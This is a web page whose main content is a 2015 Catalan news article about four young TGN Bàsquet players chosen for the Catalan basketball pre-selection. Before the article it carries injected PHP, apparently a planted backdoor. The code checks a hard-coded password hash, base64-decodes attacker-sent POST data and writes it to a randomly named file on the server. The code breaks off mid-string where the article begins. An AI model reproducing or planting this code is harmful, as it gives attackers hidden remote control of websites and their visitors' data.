function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Quatre jugadors alevins del TGN Bàsquet a la preselecció catalana - Tgn Bàsquet Club -

Quatre jugadors alevins del TGN Bàsquet a la preselecció catalana

By
Updated: juny 16, 2015

Fruit rere fruit. El treball sempre té recompensa i en el món del bàsquet de formació aquest reconeixement es tradueix en jugadors ben treballats, sabent aprofitar el seu talent per fer-los arribar el més amunt possible i, sobretot, formar-los globalment, no només com a simples esportistes. Enguany, la Federació Catalana de Basquetbol ha sabut reconèixer la feina feta pel TGN Bàsquet i ha triat quatre dels seus jugadors alevins per formar part de la preselecció catalana. Això vol dir que quatre jugadors del Sagrat Cor es troben entre els cinquanta millors de tot Catalunya, tot esperant la llista definitiva que es farà aquest estiu. “És un orgull. Fa quatre anys que portem jugadors a la preselecció catalana però aquesta vegada hem superat el nostre rècord perquè mai havíem tingut quatre jugadors preseleccionats alhora”, explica Iñaki Liarte, vicepresident del TGN Bàsquet. Els jugadors són Raül Neila, Paula Moreno, Irene Jiménez i Irene Fernández. “Només dos jugadors del club han arribat a la selecció catalana: Isa Rovira [categories alevina, infantil i cadet] i Guillem Fàbregas [aleví]”, recorda Liarte.

“Va ser molt bonic, hi havia un munt de nens. M’agradaria continuar anant a aquest tipus de concentració i sé que per fer-ho m’he d’esforçar molt”, admet un tímid però satisfet Raül Neila. “Dediquem molts esforços a què els nostres jugadors tinguin les millors instal·lacions, el millor material i els millors tècnics per poder desenvolupar tot el seu potencial. Això vol dir que estem fent les coses bé”, diu Liarte.

Els quatre alevins van fer una jornada d’entrenament amb la resta de preseleccionats catalans a les instal·lacions que la Federació Catalana de Bàsquet té a Barcelona (Bac de Roda). “Va ser fantàstic perquè vam poder conèixer molts jugadors d’altres llocs que eren molt bons i això serveix per aprendre més”, admet Paula Moreno mentre que la seva companya, Irene Jiménez, va destacar els nervis inicials: “Em va agradar molt perquè no havia estat mai en una convocatòria com aquesta. L’entrenament va ser molt semblant al que fem al TGN Bàsquet; al començament em va costar una mica adaptar-me però després ja ho vaig agafar de seguida.”

“Com a club participem al programa de detecció i perfeccionament de la federació catalana (PDP) i enguany hem tingut 9 jugadores alevines i 5 jugadors alevins. En aquest programa es fan una sèrie d’entrenaments durant tota la temporada i els tècnics de la federació catalana trien quins nens van a la preselecció o no. A l’estiu faran un campus i és aleshores quan decidiran els jugadors pera a la selecció. Per nosaltres és un orgull perquè quan arribes allí dius que ets del Sagrat Cor de Tarragona i de vegades se sorprenen que els nostres jugadors s’hagin format a l’escola”, diu el vicepresident del TGN Bàsquet.

“El nivell de bàsquet era molt alt, tots eren grans jugadors, però crec que puc jugar al mateix nivell que ells, tot i que em costarà una mica. Si treballo com fins ara ho podré fer”, explica Irene Fernández.

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *